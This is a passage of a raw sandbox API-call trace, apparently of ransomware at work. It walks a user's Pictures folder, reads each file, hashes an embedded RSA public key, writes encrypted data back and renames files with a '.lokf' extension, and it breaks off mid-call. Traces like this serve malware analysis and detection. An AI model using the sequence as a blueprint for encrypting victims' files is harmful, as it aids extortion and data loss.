1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4d8 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4a8 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4a8 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4a8 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4d8 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4c0 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b490 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b478 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83388 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.169] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x99d2, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x99d2, lpOverlapped=0x0) returned 1 [0059.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.170] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x99d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.170] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.170] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.170] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.170] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.170] CloseHandle (hObject=0x5cc) returned 1 [0059.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0059.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32695e0 | out: hHeap=0x660000) returned 1 [0059.171] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IIQQGpJ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iiqqgpj.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IIQQGpJ.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iiqqgpj.gif.lokf")) returned 1 [0059.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.171] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.172] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74411580, ftCreationTime.dwHighDateTime=0x1d4c73a, ftLastAccessTime.dwLowDateTime=0x73ade950, ftLastAccessTime.dwHighDateTime=0x1d4d116, ftLastWriteTime.dwLowDateTime=0x73ade950, ftLastWriteTime.dwHighDateTime=0x1d4d116, nFileSizeHigh=0x0, nFileSizeLow=0x89cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lY0DCvr2.bmp", cAlternateFileName="")) returned 1 [0059.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.173] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lY0DCvr2.bmp") returned=".bmp" [0059.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lY0DCvr2.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ly0dcvr2.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.173] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=35277) returned 1 [0059.173] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.175] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x89a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.175] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.176] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.176] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x89cd, lpOverlapped=0x0) returned 1 [0059.176] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.176] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.176] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.176] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.177] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.177] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.177] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.177] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.177] GetLastError () returned 0x0 [0059.177] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.177] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.177] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.177] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.177] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x89d0) returned 0x9c83710 [0059.178] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83388 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b478 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c833d0 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b490 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4c0 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4d8 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.178] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4c0 | out: hHeap=0x660000) returned 1 [0059.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4d8 | out: hHeap=0x660000) returned 1 [0059.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4d8 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b4c0 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4d8 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4c0 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.179] GetCurrentThreadId () returned 0x9e0 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7df58 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.179] GetCurrentThreadId () returned 0x9e0 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4c0 [0059.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.180] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x89cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.180] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: 